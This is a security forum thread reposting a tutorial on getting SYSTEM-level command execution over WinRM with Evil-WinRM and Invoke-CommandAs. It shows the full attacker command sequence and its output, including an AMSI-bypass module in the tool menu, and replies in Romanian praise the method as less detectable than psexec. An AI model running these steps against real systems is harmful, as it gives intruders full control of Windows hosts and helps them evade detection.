Nytro Posted September 14, 2020 Report Posted September 14, 2020 Run as SYSTEM using Evil-WinRM This is a quick blog post on how to elevate to SYSTEM without the need for PSEXEC when you are using PowerShell, or more specifcially in this case, PowerShell Remoting (WinRM). First off, let me introduce my tool of choice here. It’s Evil-WinRM. I spoke about it in the Practical Exploitation video here: https://www.youtube.com/watch?v=tVgJ-9FJKxE, so I won’t go too far indepth. It’s essentially the only WinRM tool that I’ve found to work well in a non-Windows native situation (also you can proxy it through proxychains which is AWESOME!!). Anyways. I want to document how to run commands as SYSTEM without the use of PSEXEC. I found this technique on a 4sysops blog post called Running PowerShell Remotely As System with Invoke-CommandAs. Side-note you should definitely bookmark thier blog it’s great. Invoke-CommandAs is not a native function of PowerShell, so you need to download it from the original author’s Github repo: https://github.com/mkellerman/Invoke-CommandAs For our uses all you need to do is get these two particular files: https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Public/Invoke-CommandAs.ps1 https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps1 Here you can see me putting those two files into a scripts directory I made inside of the Evil-WinRM folder. (git clone https://github.com/Hackplayers/evil-winrm + bundle install) root@attacker:~/evil-winrm/scripts# ls Invoke-CommandAs.ps1 root@attacker:~/evil-winrm/scripts# wget https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke- --2020-09-13 20:17:56-- https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.200.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.200.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 10009 (9.8K) [text/plain] Saving to: 'Invoke-ScheduledTask.ps1' Invoke-ScheduledTask.ps1 100%[=========================================================================================== 2020-09-13 20:17:56 (5.37 MB/s) - 'Invoke-ScheduledTask.ps1' saved [10009/10009] Once that’s ready, I run Evil-WinRM with the -s flag and specify the scripts directory I put the two files in. root@attacker:~/evil-winrm# ruby evil-winrm.rb -i 192.168.80.10 -u uberuser -s scripts/ Enter Password: Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\uberuser\Documents> Once I have the shell I load each of the scripts by typing out their file names (tab complete should work) *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-ScheduledTask.ps1 *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs.ps1 Once they are loaded you need to run the menu command to load the functions into memory on the attackers side. I haven’t looked at the code enough to know exactly why this is needed, but it doesn’t seem to work if you don’t. *Evil-WinRM* PS C:\Users\uberuser\Documents> menu ,. ( . ) " ,. ( . ) . (" ( ) )' ,' (` '` (" ) )' ,' . ,) .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( _".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') \_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ | __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ | \\ /| | |__ /_____/ \ /| | | \ | \/ Y \ /_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ / \/ \/ \/ \/ \/ By: CyberVaca, OscarAkaElvis, Laox @Hackplayers [+] Bypass-4MSI [+] Dll-Loader [+] Donut-Loader [+] Invoke-Binary [+] Invoke-CommandAs [+] Invoke-ScheduledTask As we can see both of the needed functions are loaded and we can finally issue our commands as SYSTEM with the -AsSystem flag and the command being whoami: *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs -ScriptBlock {whoami} -AsSystem nt authority\system *Evil-WinRM* PS C:\Users\uberuser\Documents> Sursa; https://malicious.link/post/2020/run-as-system-using-evil-winrm/ Quote
biosh3ll Posted September 15, 2020 Report Posted September 15, 2020 Nu e cumva degeaba? Stiam ca nu poti sa iesi cu procese de system spre internet(nu te autentifica proxy). Procesul va folosi DefaultNetworkCredentials care sunt caracteristicile procesului Quote
Nytro Posted September 15, 2020 Author Report Posted September 15, 2020 Nu e degeaba, e o alternativa la psexec (care e detectabil). WinRM e folosit de catre sysadmin (in mod oficial) pentru managementul sistemelor Windows folosind PowerShell asa cum SSH si bash sunt folosite pe Linux. Ce face de fapt e cam acelasi lucru, creeaza un scheduled task prin care ruleaza ca SYSTEM ce vrei tu. Desigur, necesita privilegile necesare. Nu "iesi cu procese de sistem spre Internet" - oricum nu exista o astfel de limitare. In plus, la nivel de sistem de operare se poate seta un proxy global dar nu e obligatoriu ca aplicatiile (orice fel, fie ca ruleaza sub user obisnuit fie ca ruleaza ca servicii gen SYSTEM) sa tina cont de ele. Exista functii din Windows care tin automat cont de ele, dar daca o aplicatie creeaza manual un socket si il conecteaza la un IP din Internet, nu o sa tina cont de acea setare. Quote
biosh3ll Posted September 15, 2020 Report Posted September 15, 2020 Pai si in contextul HTTP cand ai web-proxy in fata ? Se mai aplica faza asta cu Winrm? Quote
Nytro Posted September 15, 2020 Author Report Posted September 15, 2020 WinRM e un serviciu care poate rula pe mai toate Windows-urile cu Powershell. Foloseste HTTP (nu se transmit date clear-text ci doar foloseste HTTP ca protocol) pe portul 5985 si HTTPS pe portul 5986. Acest serviciu asculta pe acele porturi si sysadminii se pot conecta, loga si executa scripturi/comenzi Powershell. Web-Proxy e folosit cand de pe un PC vrei sa te conectezi undeva pe Internet (si cum ziceam, poate fi bypassat by design daca e cel setat in Windows). Sysadmin -- WinRM --> PC pe care are treaba -- HTTP via web proxy --> Site-urile pe care intra userul acelui PC Quote
